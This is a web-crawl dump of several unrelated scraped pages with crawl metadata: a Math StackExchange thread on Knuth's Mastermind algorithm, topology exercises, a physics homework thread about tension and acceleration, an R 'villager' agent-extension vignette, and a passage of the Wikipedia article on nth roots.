msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:1c7636ac-43c9-42b7-9555-e230dd0d562a>\",\"WARC-Concurrent-To\":\"<urn:uuid:6df15944-def9-47b1-a6cc-6c2adec4c5c3>\",\"WARC-IP-Address\":\"172.67.211.8\",\"WARC-Target-URI\":\"https://usmam.org/what-is-the-rate-at-which-an-object-moves/\",\"WARC-Payload-Digest\":\"sha1:73DIGBVJMZBV5GU2EVGV2MI5KJWIFFPR\",\"WARC-Block-Digest\":\"sha1:RR5PSI7LCWAUMUIIRP2NH6UMNP7CHEXK\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-27/CC-MAIN-2022-27_segments_1656103943339.53_warc_CC-MAIN-20220701155803-20220701185803-00188.warc.gz\"}"}
https://math.stackexchange.com/questions/1192961/knuths-mastermind-algorithm/1193037#1193037
[ "# Knuth's mastermind algorithm\n\nI read the other thread regarding Knuth's algorithm and mastermind but I still do not understand quite how it would be implemented. I am confused by the language or my brain is just broken (or both).\n\nI understand that you start with a list S of all possible permutations based on the particular game's parameters, for example a list of 1296 possible 4-digit combinations where each digit can be a number 1-6 (including repeats).\n\nYou create a 4 digit secret code.\n\nYou play a guess (from the list S) against the secret code and receive a response in terms of black and white \"pegs\", where each black peg means the guess has the right digit in the right spot, and each white peg means the guess has the right digit in the wrong spot.\n\nAccording to Knuth, you should always use 1122 as the first guess, from which you get a response in terms of black and white pegs.\n\nThen, in order to reduce the number of possible guesses for the next turn and eventually find the right code, if the response is not 4 black pegs (meaning the code has been guessed correctly and the game's over), we are to remove from S any element (guess, code, whatever you want to call it) that would not give the same response if it (the guess/code/element in S) were the code.\n\nWhat does that mean? Is anyone else confused by that wording?\n\nI do not understand what comparison is being made here. To me, this means that if the response to the first guess of 1122 is one black, one white, we would remove from S all of the potential guesses that, when played against the secret code, would not return the same response of one black, one white. That would of course leave us with a list of possibilities that would not contain the correct answer, because it would just be a list of elements that would all get a response of one black, one white.\n\nSo I see that obviously that can't be what it means, so the alternative is to say \"OK it must mean that you should remove from S every potential guess that also returns the one black, one white) answer and go from there.\" That makes more sense than my initial interpretation but it still doesn't feel right.\n\nCan anyone help explain this using multiple examples? I cannot wrap my head around what comparison is being made and what two things are actually being compared in order to remove elements from S.\n\n• You don't create a 4-digit secret code. Your opponent does. Perhaps this is the source of your confusion. Mar 16, 2015 at 22:40\n• Thanks TonyK but no, that is not the issue. I understand how the game works, I am just trying to understand the logic of Knuth's algorithm. I was hung up on the language used to describe narrowing the list of S which I would argue is ambiguous (at least as it exists in the Wikipedia article). Mar 17, 2015 at 4:57\n• There's comprehensive explanation on this link for all mastermind strategies: serkangur.freeservers.com Jun 6, 2016 at 16:42\n\nLet's say $S_i$ is an element of $S$, the possible values of the winning code.\n\nWhat you're asking of each $S_i$ at the step you're puzzling about is this:\n\nIf the answer were $S_i$, would I have gotten the response I got with my current guess?\n\nIf the answer is no, then $S_i$ cannot be the code, because you would have gotten a different response. If the answer is yes, then you keep that around for another turn, because it's consistent with the response you got. In other words, you can't eliminate it as impossible.\n\nLooking at the example in the other thread:\n\nYou guess $1122$ and get one black peg (one peg color correct and in the right position) and one white peg (one peg color correct but in the wrong position).\n\nThe step of reducing the list involves asking, for every $S_i$, \"Would I have gotten one black peg and one white peg with my guess of $1122$ if the code were $S_i$?\"\n\nOK, so let's do a few:\n\n• If the code were $1111$ I would have gotten two black pegs ($BB$) with my guess of $1122$, which is not the same as one black peg and one white peg ($BW$). (Represent this by $F(1122, 1111) = BB$.) So, I remove $1111$ from the list of potential solutions.\n• $F(1122, 1112) = BBB \\neq BW \\to \\text{Remove 1112 from S}$\n• $F(1122, 1113) = BB \\neq BW \\to \\text{Remove 1113 from S}$\n• $F(1122, 1114) = BB \\neq BW \\to \\text{Remove 1114 from S}$\n• $F(1122, 1115) = BB \\neq BW \\to \\text{Remove 1115 from S}$\n\nAnd so forth.\n\nHowever,\n\n• $F(1122, 1314) = BW = BW \\to \\text{Keep 1314 in S}$\n\nHope this helps.\n\n• Ok I think this has helped me understand my hangup -- when removing elements from S, rather than bumping each element in S against the actual secret code, we're bumping each element in S against the most recent guess. So once we start eliminating the elements from the list of S we're basically forgetting the real code for a moment and comparing each element to the most recent guess? Mar 17, 2015 at 4:53\n• Yes. The actual secret code is in $S$. Each guess is in $S$ (or should be if you're playing to win!) and eliminates a bunch of candidate secret codes based on the response. This reduces the number of members in $S$, and you guess again (again, using one of the remaining members of $S$) until you win.\n– John\nMar 18, 2015 at 19:23\n• \"If the code were 1111 I would have gotten two black pegs\" how do you know that? you might aswell have ended up with 0 blacks and 0 whites. Taking into account that we dont know if the black peg represents the 1 or the 2 value. and you also dont know if it is a 1 or a 2 that is out of position. Nov 14, 2016 at 20:19\n• @Nulle Earlier in my answer I wrote: \"You guess 1122 and get one black peg ... and one white peg ...\" Based on this particular guess (1122) and the response to this guess (one black, one white), the actual code cannot be 1111.\n– John\nNov 14, 2016 at 23:12\n• I don't think it's quite as simple as this. Knuth was rather considering, for each possible clue that a code might receive, how much the remaining possible codes would be reduced. Knuth actually pointed out that the code to guess next might actually be impossible based on previous clues, yet would still most reduce the potential codes remaining and should still be guessed (that is, even knowing that it is not the correct code) to ensure that the correct code is actually guessed within five guesses. Aug 1, 2018 at 2:59" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9687407,"math_prob":0.8770307,"size":2313,"snap":"2022-05-2022-21","text_gpt3_token_len":502,"char_repetition_ratio":0.12472932,"word_repetition_ratio":0.06146572,"special_character_ratio":0.21833117,"punctuation_ratio":0.0770878,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9796184,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-05-28T14:55:32Z\",\"WARC-Record-ID\":\"<urn:uuid:fa13ece1-36f9-416d-ab64-24843c721db7>\",\"Content-Length\":\"237430\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:84345c7f-6ad3-4e48-ba80-abc510561d75>\",\"WARC-Concurrent-To\":\"<urn:uuid:c32b0524-c5bc-432c-862d-d895c1d9022c>\",\"WARC-IP-Address\":\"151.101.129.69\",\"WARC-Target-URI\":\"https://math.stackexchange.com/questions/1192961/knuths-mastermind-algorithm/1193037#1193037\",\"WARC-Payload-Digest\":\"sha1:ZU2DZYSW5XWYBN4H7CXJBWEO6XX5EBWI\",\"WARC-Block-Digest\":\"sha1:BTJPB7COVLB6HI3NKA7SZCY4Z522RACX\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-21/CC-MAIN-2022-21_segments_1652663016853.88_warc_CC-MAIN-20220528123744-20220528153744-00251.warc.gz\"}"}
https://blogs.helsinki.fi/kulikov/2011/10/12/product-of-topological-spaces/
[ "# The Product of Topological Spaces Does Not Obey Cancellation\n\nExercise 1. Find metric topological spaces $$A,B,C$$ such that $$A$$ is not homeomorphic to $$B$$, but $$A\\times C$$ is homeomorphic to $$B\\times C$$.\n\nExercise 2. Find path connected metric topological spaces $$A,B,C$$ such that $$A$$ is not homeomorphic to $$B$$, but $$A\\times C$$ is homeomorphic to $$B\\times C$$.", null, "" ]
[ null, "https://secure.gravatar.com/avatar/20400f44277a7fdd85e9ec794f1878d9", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.64082336,"math_prob":1.0000094,"size":386,"snap":"2023-40-2023-50","text_gpt3_token_len":130,"char_repetition_ratio":0.20942408,"word_repetition_ratio":0.72727275,"special_character_ratio":0.29274613,"punctuation_ratio":0.11627907,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99999666,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-11-29T22:31:18Z\",\"WARC-Record-ID\":\"<urn:uuid:bcfb7875-94f5-4852-b4eb-04392911cb90>\",\"Content-Length\":\"38782\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:f5c5a21b-94a7-4763-b605-3832052912d8>\",\"WARC-Concurrent-To\":\"<urn:uuid:e6887206-6ff4-4b94-80d0-5653749040b5>\",\"WARC-IP-Address\":\"128.214.54.149\",\"WARC-Target-URI\":\"https://blogs.helsinki.fi/kulikov/2011/10/12/product-of-topological-spaces/\",\"WARC-Payload-Digest\":\"sha1:STW7OGP3U3EYMRCKFIH5WQXATGYHXOG5\",\"WARC-Block-Digest\":\"sha1:LNLYNWBWOFYNDDBXIS6NIZC7JMRHQMTK\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-50/CC-MAIN-2023-50_segments_1700679100146.5_warc_CC-MAIN-20231129204528-20231129234528-00117.warc.gz\"}"}
https://www.physicsforums.com/threads/box-in-a-car.235088/
[ "# Box in a Car\n\nHi, i'm new here. I have a problem.\n\n## Homework Statement\n\nA box has the mass m, held by two horizontal ropes and two vertical ropes. The box is inside a still car. If the car accelerated suddenly with the accekeration of a then the box will remain still inside the car. What is :\na. The acceleration of the box/car? (state it in t1, t2, t3, t4 and g)\nb. The separation after the time t? (state it in t1, t2, t3, t4, t and g)\n\nThe illustration is here -> xttp://i31.tinypic.com/izvnev.jpg (change x to h)\n\n## Homework Equations\n\n$$\\Sigma F = ma$$\n\n## The Attempt at a Solution\n\na.\nt3 + t1 = ma\nm = (t3 + t1)/a (1)\n\nt4 + t2 = mg\nm = (t4 + t2)/g (2)\n\n(t3 + t1)/a = (t4 + t2)/g\na = g(t3 + t1)/ t4 + t2 (3)\n\nb.\nS = Vt\nS = a * t * t\nS = (g(t3 + t1)/ t4 + t2) * t^2\nS = g (t^2) ((t3 + t1)/(t4 + t2))\n\nI actually don't really know how the tensions work. I hope someone can explain it to me. And sorry, i'm not used to using latex yet.\n\nLast edited:\n\nPhanthomJay\nHomework Helper\nGold Member\nHi, i'm new here. I have a problem.\n\n## Homework Statement\n\nA box has the mass m, held by two horizontal ropes and two vertical ropes. The box is inside a still car. If the car accelerated suddenly with the accekeration of a then the box will remain still inside the car. What is :\na. The acceleration of the box/car? (state it in t1, t2, t3, t4 and g)\nb. The separation after the time t? (state it in t1, t2, t3, t4, t and g)\n\nThe illustration is here -> xttp://i31.tinypic.com/izvnev.jpg (change x to h)\n\n## Homework Equations\n\n$$\\Sigma F = ma$$\n\n## The Attempt at a Solution\n\na.\nt3 + t1 = ma\nm = (t3 + t1)/a (1)\n\nt4 + t2 = mg\nm = (t4 + t2)/g (2)\n\n(t3 + t1)/a = (t4 + t2)/g\na = g(t3 + t1)/ t4 + t2 (3)\n\nb.\nS = Vt\nS = a * t * t\nS = (g(t3 + t1)/ t4 + t2) * t^2\nS = g (t^2) ((t3 + t1)/(t4 + t2))\n\nI actually don't really know how the tensions work. I hope someone can explain it to me. And sorry, i'm not used to using latex yet.\nHi, Vermillion, and welcome to the Forums! A few points here to help you along in part (a), if I understand the problem correctly, and assume horizontal motion and massless, inextensible ropes:: First, Tension forces always pull away from the object they act on, so in your equations, check your plus and minus signs. Secondly, you have equated your 2 equations when solving each for m, which is unnecessary. The acceleration in the horizontal and vertical directions are independent of each other. Thirdly, with the box accelerating to the right (with respect to the ground), the box would appear to fare quite well without the left and bottom ropes present.\n\nFor part (b), what separation is the problem talking about? Since the box remains still inside the car, there can be no separation between the box and car, so I guess the problem means to ask about the displacement of the box with respect to the ground, in which case you need to use your basic motion eqations.\n\nOh wow thanks! I actually never knew that tension forces always pull away from the object they act on, duh.... As for the 2 equations of m, i needed them to solve the a(acceleration) in t1, t2, t3 ,t4, and g. My third equation is actually m = m. Sorry, i didn't type it.\n\nI think i have done the correct equations now.\nma + t1 = t3\nma = t3 - t1\nm = (t3 - t1)/a (1)\n\nmg + t2 = t4\nmg = t4 - t2\nm = (t4 - t2)/g (2)\n\nm = m\n(t3 - t1)/a = (t4 - t2)/g\na = g(t3 - t1)/(t4- t2 (3)\n\nSo the separation would be\n\ns = vt\ns = a*t^2\ns = (t^2*g(t3-t1)) / t4-t2\n\nIs that correct?\n\nPhanthomJay\nHomework Helper\nGold Member\nOh wow thanks! I actually never knew that tension forces always pull away from the object they act on, duh.... As for the 2 equations of m, i needed them to solve the a(acceleration) in t1, t2, t3 ,t4, and g. My third equation is actually m = m. Sorry, i didn't type it.\n\nI think i have done the correct equations now.\nma + t1 = t3\nma = t3 - t1\nm = (t3 - t1)/a (1)\n\nmg + t2 = t4\nmg = t4 - t2\nm = (t4 - t2)/g (2)\n\nm = m\n(t3 - t1)/a = (t4 - t2)/g\na = g(t3 - t1)/(t4- t2 (3)\n\nSo the separation would be\n\ns = vt\ns = a*t^2\ns = (t^2*g(t3-t1)) / t4-t2\n\nIs that correct?\nPart (a) is correct, since the problem asked you to solve for the acceleration in terms of those variables. Part (b), however, is not correct. In the equation s=vt, the 'v' refers to the average velocity (the average of the initial velocity and final velocity at time 't'), whereas in the equation V=at, the 'V' refers to the final velocity at the end of the time period of an object starting from rest. Average velocity and final velocity are not the same. How are they related?\n\nYou're right, i forgot the velocity is not constant. Then i should use\n\n$$s = v0t + \\frac{at^2}{2}$$\n\nBecause the car was resting then\n\n$$v0 = 0$$\n\n$$s = \\frac{at^2}{2}$$\n\n$$s = \\frac{gt^2(t3-t1)}{2(t4-t2)}$$\n\nIs that correct?\n\nLast edited:\nPhanthomJay" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8735175,"math_prob":0.99856526,"size":1759,"snap":"2022-05-2022-21","text_gpt3_token_len":663,"char_repetition_ratio":0.12820514,"word_repetition_ratio":0.88265306,"special_character_ratio":0.4002274,"punctuation_ratio":0.13145539,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99957055,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-05-23T21:28:27Z\",\"WARC-Record-ID\":\"<urn:uuid:6dbcfe7a-6292-4b37-ba26-8c6e5a68e669>\",\"Content-Length\":\"80069\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:bba56d19-5a55-4882-b997-1e9aeee9af5e>\",\"WARC-Concurrent-To\":\"<urn:uuid:0388d2bf-6f80-441e-9dee-cb0f18d8cf1e>\",\"WARC-IP-Address\":\"172.67.68.135\",\"WARC-Target-URI\":\"https://www.physicsforums.com/threads/box-in-a-car.235088/\",\"WARC-Payload-Digest\":\"sha1:HZGIQ77PTGJB22KOGXYOTKTBBA65URCF\",\"WARC-Block-Digest\":\"sha1:QTAD22PJGR3T5CBYA6OEANQBKHLO4VBK\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-21/CC-MAIN-2022-21_segments_1652662561747.42_warc_CC-MAIN-20220523194013-20220523224013-00215.warc.gz\"}"}
https://cran.ma.ic.ac.uk/web/packages/villager/vignettes/extending-agents.html
[ "# extending-winiks\n\n\nlibrary(villager)\nlibrary(leaflet)\n#> Warning: package 'leaflet' was built under R version 4.0.5\n\n# Extending Agents\n\nTo create agents (winiks) that have more properties than the ones provided by villager, subclass the winik class into a new R6 class. Once sub-classed, additional properties can be added to the winik which can be used in the subsequent model. The new winik class can be tied to individual villages. This gives flexibility to model populations differently when running under the same simulation.\n\nTo add new members to the winik class,\n\n1. Copy the winik class source code\n2. Create the new member variable\n3. Add it as a parameter to the initialize function\n4. Make an entry for it in the as_table function\n\n## Agent with a GPS coordinate\n\nTo give a complete example of the sublclassing process, consider an extended agent. In this case the agent has an additional property, gps_coordinates, that’s a named list of latitude and longitude coordinates: [lat=1234, long=1234]. Each coordinate gets updated by the model each day by a random number.\n\nTo start the base class off, the original class was copied to save time with the member variable definitions.\n\n### Custom winik class\n\ngps_winik <- R6::R6Class(\"winik\",\ninherit = villager::winik,\npublic = list(\nage = NULL,\nalive = NULL,\nchildren = NULL,\nfather_id = NULL,\nfirst_name = NULL,\ngender = NULL,\nhealth = NULL,\nidentifier = NULL,\nlast_name = NULL,\nmother_id = NULL,\npartner = NULL,\nprofession = NULL,\nlatitude = NULL,\nlongitude = NULL,\n\ninitialize = function(identifier = NA,\nfirst_name = NA,\nlast_name = NA,\nage = 0,\nmother_id = NA,\nfather_id = NA,\npartner = NA,\nchildren = vector(mode = \"character\"),\ngender = NA,\nprofession = NA,\nalive = TRUE,\nhealth = 100,\nlatitude = 0,\nlongitude = 0) {\nsuper$initialize(identifier, first_name, last_name, age, mother_id, father_id, partner, children, gender, profession, alive, health) self$latitude <- latitude\nself$longitude <- longitude }, as_table = function() { winik_table <- data.frame( age = self$age,\nalive = self$alive, father_id = self$father_id,\nfirst_name = self$first_name, gender = self$gender,\nhealth = self$health, identifier = self$identifier,\nlast_name = self$last_name, mother_id = self$mother_id,\npartner = self$partner, profession = self$profession,\nlatitude = self$latitude, longitude = self$longitude\n)\nreturn(winik_table)\n}\n)\n)\n\n### Initial Condition\n\nWe’ll create the initial population of one Agent in the initial_condition function, which gets run before the model starts. The initial starting location is in Los Angeles, Ca. Note that the new gps_winik class is used to instantiate the agent rather than the library provided winik class.\n\ninitial_condition <- function(current_state, model_data, winik_mgr, resource_mgr) {\n# Create the initial villagers\ntest_agent <- gps_winik$new(first_name=\"Lewis\", last_name=\"Taylor\", age=9125, latitude=33.8785486, longitude=-118.0434921) winik_mgr$add_winik(test_agent)\n}\n\n### Model\n\nEach day, the model picks a number between 0.0000001 and 0.0000003 and increments gps_coordinate on the winik.\n\ntest_model <- function(current_state, previous_state, model_data, winik_mgr, resource_mgr) {\n# Loop over all the winiks (just one at the moment)\nfor (winik in winik_mgr$get_living_winiks()) { # Generate new coordinates latitude <- winik$latitude + runif(1, 0.01, 0.03)\nlongitude <- winik$longitude + runif(1, 0.01, 0.03) winik$latitude <- latitude\nwinik$longitude <- longitude } } ### Running Finally, we’ll create and run a simulation with a duration of 10 days. los_angeles <- village$new(\"Test_Village\", initial_condition, test_model, gps_winik)\nsimulator <- simulation$new(10, list(los_angeles)) simulator$run_model()\n\n### Results\n\n# Load in data\n#>\n#> ── Column specification ────────────────────────────────────────────────────────\n#> cols(\n#> age = col_double(),\n#> alive = col_logical(),\n#> father_id = col_logical(),\n#> first_name = col_character(),\n#> gender = col_logical(),\n#> health = col_double(),\n#> identifier = col_character(),\n#> last_name = col_character(),\n#> mother_id = col_logical(),\n#> partner = col_logical(),\n#> profession = col_logical(),\n#> latitude = col_double(),\n#> longitude = col_double(),\n#> step = col_double()\n#> )\n\n# Grab just the location data\nagent_location <- data.frame(latitude = agent_data$latitude, longitude = agent_data$longitude)\n\n# create a map\nleaflet::leaflet() %>%\nleaflet::addMarkers (data = agent_location) # Add agent locations" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.63838273,"math_prob":0.9566893,"size":4295,"snap":"2022-40-2023-06","text_gpt3_token_len":1087,"char_repetition_ratio":0.16010255,"word_repetition_ratio":0.0,"special_character_ratio":0.2749709,"punctuation_ratio":0.20264317,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9772848,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-01-29T02:53:43Z\",\"WARC-Record-ID\":\"<urn:uuid:cc9e8c71-d64f-42cd-aad1-0820a33cc7ac>\",\"Content-Length\":\"498598\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:9651aad6-fcf3-4f5c-b3be-734341786978>\",\"WARC-Concurrent-To\":\"<urn:uuid:c34e6378-62a0-4195-b13d-59153a83e79d>\",\"WARC-IP-Address\":\"155.198.195.11\",\"WARC-Target-URI\":\"https://cran.ma.ic.ac.uk/web/packages/villager/vignettes/extending-agents.html\",\"WARC-Payload-Digest\":\"sha1:6CJAUE4ZIEV3BZWE53GXKHNEUDMQRUIO\",\"WARC-Block-Digest\":\"sha1:5E3U2NRJDLAIPMURSWPS36DONQ46P77B\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-06/CC-MAIN-2023-06_segments_1674764499697.75_warc_CC-MAIN-20230129012420-20230129042420-00581.warc.gz\"}"}
https://en.m.wikipedia.org/wiki/Nth_root
[ "# nth root\n\nIn mathematics, an nth root of a number x is a number r which, when raised to the power n, yields x:\n\n$r^{n}=x,$", null, "where n is a positive integer, sometimes called the degree of the root. A root of degree 2 is called a square root and a root of degree 3, a cube root. Roots of higher degree are referred by using ordinal numbers, as in fourth root, twentieth root, etc. The computation of an nth root is a root extraction.\n\nFor example, 3 is a square root of 9, since 32 = 9, and −3 is also a square root of 9, since (−3)2 = 9.\n\nAny non-zero number considered as a complex number has n different complex nth roots, including the real ones (at most two). The nth root of 0 is zero for all positive integers n, since 0n = 0. In particular, if n is even and x is a positive real number, one of its nth roots is real and positive, one is negative, and the others (when n > 2) are non-real complex numbers; if n is even and x is a negative real number, none of the nth roots is real. If n is odd and x is real, one nth root is real and has the same sign as x, while the other (n – 1) roots are not real. Finally, if x is not real, then none of its nth roots are real.\n\nRoots of real numbers are usually written using the radical symbol or radix ${\\sqrt {{~^{~}}^{~}\\!\\!}}$", null, ", with ${\\sqrt {x}}$", null, "denoting the positive square root of x if x is positive; for higher roots, ${\\sqrt[{n}]{x}}$", null, "denotes the real nth root if n is odd, and the positive nth root if n is even and x is positive. In the other cases, the symbol is not commonly used as being ambiguous. In the expression ${\\sqrt[{n}]{x}}$", null, ", the integer n is called the index and x is called the radicand.\n\nWhen complex nth roots are considered, it is often useful to choose one of the roots, called principal root, as a principal value. The common choice is to choose the principal nth root of x as the nth root, with the greatest real part, and, when there are two (for x real and negative), the one with a positive imaginary part. This makes the nth root a function that is real and positive for x real and positive, and is continuous in the whole complex plane, except for values of x that are real and negative.\n\nA difficulty with this choice is that, for a negative real number and an odd index, the principal nth root is not the real one. For example, $-8$", null, "has three cube roots, $-2$", null, ", $1+i{\\sqrt {3}}$", null, "and $1-i{\\sqrt {3}}.$", null, "The real cube root is $-2$", null, "and the principal cube root is $1+i{\\sqrt {3}}.$", null, "An unresolved root, especially one using the radical symbol, is sometimes referred to as a surd or a radical. Any expression containing a radical, whether it is a square root, a cube root, or a higher root, is called a radical expression, and if it contains no transcendental functions or transcendental numbers it is called an algebraic expression.\n\nRoots can also be defined as special cases of exponentiation, where the exponent is a fraction:\n\n${\\sqrt[{n}]{x}}=x^{1/n}.$", null, "Roots are used for determining the radius of convergence of a power series with the root test. The nth roots of 1 are called roots of unity and play a fundamental role in various areas of mathematics, such as number theory, theory of equations, and Fourier transform.\n\n## History\n\nAn archaic term for the operation of taking nth roots is radication.\n\n## Definition and notation\n\nAn nth root of a number x, where n is a positive integer, is any of the n real or complex numbers r whose nth power is x:\n\n$r^{n}=x.$\n\nEvery positive real number x has a single positive nth root, called the principal nth root, which is written ${\\sqrt[{n}]{x}}$ . For n equal to 2 this is called the principal square root and the n is omitted. The nth root can also be represented using exponentiation as x1/n.\n\nFor even values of n, positive numbers also have a negative nth root, while negative numbers do not have a real nth root. For odd values of n, every negative number x has a real negative nth root. For example, −2 has a real 5th root, ${\\sqrt[{5}]{-2}}=-1.148698354\\ldots$  but −2 does not have any real 6th roots.\n\nEvery non-zero number x, real or complex, has n different complex number nth roots. (In the case x is real, this count includes any real nth roots.) The only complex root of 0 is 0.\n\nThe nth roots of almost all numbers (all integers except the nth powers, and all rationals except the quotients of two nth powers) are irrational. For example,\n\n${\\sqrt {2}}=1.414213562\\ldots$\n\nAll nth roots of integers are algebraic numbers.\n\nThe term surd traces back to al-Khwārizmī (c. 825), who referred to rational and irrational numbers as audible and inaudible, respectively. This later led to the Arabic word \"أصم‎\" (asamm, meaning \"deaf\" or \"dumb\") for irrational number being translated into Latin as \"surdus\" (meaning \"deaf\" or \"mute\"). Gerard of Cremona (c. 1150), Fibonacci (1202), and then Robert Recorde (1551) all used the term to refer to unresolved irrational roots, that is, expressions of the form ${\\sqrt[{n}]{i}},$  in which $n$  and $i$  are integer numerals and the whole expression denotes an irrational number. Quadratic irrational numbers, that is, irrational numbers of the form ${\\sqrt {i}},$  are also known as \"quadratic surds\".\n\n### Square roots\n\nThe graph $y=\\pm {\\sqrt {x}}$ .\n\nA square root of a number x is a number r which, when squared, becomes x:\n\n$r^{2}=x.$\n\nEvery positive real number has two square roots, one positive and one negative. For example, the two square roots of 25 are 5 and −5. The positive square root is also known as the principal square root, and is denoted with a radical sign:\n\n${\\sqrt {25}}=5.$\n\nSince the square of every real number is nonnegative, negative numbers do not have real square roots. However, for every negative real number there are two imaginary square roots. For example, the square roots of −25 are 5i and −5i, where i represents a number whose square is −1.\n\n### Cube roots\n\nThe graph $y={\\sqrt[{3}]{x}}$ .\n\nA cube root of a number x is a number r whose cube is x:\n\n$r^{3}=x.$\n\nEvery real number x has exactly one real cube root, written ${\\sqrt[{3}]{x}}$ . For example,\n\n${\\sqrt[{3}]{8}}=2$  and ${\\sqrt[{3}]{-8}}=-2.$\n\nEvery real number has two additional complex cube roots.\n\n## Identities and properties\n\nExpressing the degree of an nth root in its exponent form, as in $x^{1/n}$ , makes it easier to manipulate powers and roots. If $a$  is a non-negative real number,\n\n${\\sqrt[{n}]{a^{m}}}=(a^{m})^{1/n}=a^{m/n}=(a^{1/n})^{m}=({\\sqrt[{n}]{a}})^{m}.$\n\nEvery non-negative number has exactly one non-negative real nth root, and so the rules for operations with surds involving non-negative radicands $a$  and $b$  are straightforward within the real numbers:\n\n{\\begin{aligned}{\\sqrt[{n}]{ab}}&={\\sqrt[{n}]{a}}{\\sqrt[{n}]{b}}\\\\{\\sqrt[{n}]{\\frac {a}{b}}}&={\\frac {\\sqrt[{n}]{a}}{\\sqrt[{n}]{b}}}\\end{aligned}}\n\nSubtleties can occur when taking the nth roots of negative or complex numbers. For instance:\n\n${\\sqrt {-1}}\\times {\\sqrt {-1}}\\neq {\\sqrt {-1\\times -1}}=1,\\quad$  but, rather, $\\quad {\\sqrt {-1}}\\times {\\sqrt {-1}}=i\\times i=i^{2}=-1.$\n\nSince the rule ${\\sqrt[{n}]{a}}\\times {\\sqrt[{n}]{b}}={\\sqrt[{n}]{ab}}$  strictly holds for non-negative real radicands only, its application leads to the inequality in the first step above.\n\n## Simplified form of a radical expression\n\nA non-nested radical expression is said to be in simplified form if\n\n1. There is no factor of the radicand that can be written as a power greater than or equal to the index.\n2. There are no fractions under the radical sign.\n3. There are no radicals in the denominator.\n\nFor example, to write the radical expression ${\\sqrt {\\tfrac {32}{5}}}$  in simplified form, we can proceed as follows. First, look for a perfect square under the square root sign and remove it:\n\n${\\sqrt {\\tfrac {32}{5}}}={\\sqrt {\\tfrac {16\\times 2}{5}}}=4{\\sqrt {\\tfrac {2}{5}}}$\n\nNext, there is a fraction under the radical sign, which we change as follows:\n\n$4{\\sqrt {\\tfrac {2}{5}}}={\\frac {4{\\sqrt {2}}}{\\sqrt {5}}}$\n\nFinally, we remove the radical from the denominator as follows:\n\n${\\frac {4{\\sqrt {2}}}{\\sqrt {5}}}={\\frac {4{\\sqrt {2}}}{\\sqrt {5}}}\\cdot {\\frac {\\sqrt {5}}{\\sqrt {5}}}={\\frac {4{\\sqrt {10}}}{5}}={\\frac {4}{5}}{\\sqrt {10}}$\n\nWhen there is a denominator involving surds it is always possible to find a factor to multiply both numerator and denominator by to simplify the expression. For instance using the factorization of the sum of two cubes:\n\n${\\frac {1}{{\\sqrt[{3}]{a}}+{\\sqrt[{3}]{b}}}}={\\frac {{\\sqrt[{3}]{a^{2}}}-{\\sqrt[{3}]{ab}}+{\\sqrt[{3}]{b^{2}}}}{\\left({\\sqrt[{3}]{a}}+{\\sqrt[{3}]{b}}\\right)\\left({\\sqrt[{3}]{a^{2}}}-{\\sqrt[{3}]{ab}}+{\\sqrt[{3}]{b^{2}}}\\right)}}={\\frac {{\\sqrt[{3}]{a^{2}}}-{\\sqrt[{3}]{ab}}+{\\sqrt[{3}]{b^{2}}}}{a+b}}.$\n\nSimplifying radical expressions involving nested radicals can be quite difficult. It is not obvious for instance that:\n\n${\\sqrt {3+2{\\sqrt {2}}}}=1+{\\sqrt {2}}$\n\nThe above can be derived through:\n\n${\\sqrt {3+2{\\sqrt {2}}}}={\\sqrt {1+2{\\sqrt {2}}+2}}={\\sqrt {1^{2}+2{\\sqrt {2}}+{\\sqrt {2}}^{2}}}={\\sqrt {\\left(1+{\\sqrt {2}}\\right)^{2}}}=1+{\\sqrt {2}}$\n\nLet $r=p/q$ , with p and q coprime and positive integers. Then ${\\sqrt[{n}]{r}}={\\sqrt[{n}]{p}}/{\\sqrt[{n}]{q}}$  is rational if and only if both ${\\sqrt[{n}]{p}}$  and ${\\sqrt[{n}]{q}}$  are integers, which means that both p and q are nth powers of some integer.\n\n## Infinite series\n\nThe radical or root may be represented by the infinite series:\n\n$(1+x)^{\\frac {s}{t}}=\\sum _{n=0}^{\\infty }{\\frac {\\prod _{k=0}^{n-1}(s-kt)}{n!t^{n}}}x^{n}$\n\nwith $|x|<1$ . This expression can be derived from the binomial series.\n\n## Computing principal roots\n\n### Using Newton's method\n\nThe nth root of a number A can be computed with Newton's method, which starts with an initial guess x0 and then iterates using the recurrence relation\n\n$x_{k+1}=x_{k}-{\\frac {x_{k}^{n}-A}{nx_{k}^{n-1}}}$\n\nuntil the desired precision is reached. For computational efficiency, the recurrence relation is commonly rewritten\n\n$x_{k+1}={\\frac {n-1}{n}}\\,x_{k}+{\\frac 